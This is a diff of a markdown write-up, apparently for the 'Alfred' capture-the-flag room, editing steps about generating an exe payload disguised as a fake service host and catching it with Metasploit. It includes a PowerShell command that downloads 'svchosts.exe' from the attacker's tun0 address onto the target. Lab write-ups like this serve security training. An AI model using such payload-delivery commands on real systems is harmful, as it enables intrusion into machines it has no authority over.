RG9n/RG9n.github.io/write-ups/alfred.md

 **What is the final size of the exe payload that you generated?**

-After creating the payload we will see the final size for our fake service in the output.
+After creating the payload, we will see the final size for our fake service host in the output.

-Now that we have our payload, we need to download it onto the device and access it through metasploit.
+Now that we have our payload, we need to transfer it onto the target and catch it with metasploit multi handler.

-Let's download it using our powershell session we got earlier with netcat off the server.
-Navigate to C:\Perflogs and then transfer the file off the server.
+Let's transfer it using our powershell session we got earlier with netcat off the server.
+Navigate to C:\Perflogs and then transfer the file off the server onto the target.

 ```
 powershell "(New-Object System.Net.WebClient).Downloadfile('http://Tun0-IP:8000/svchosts.exe','svchosts.exe')"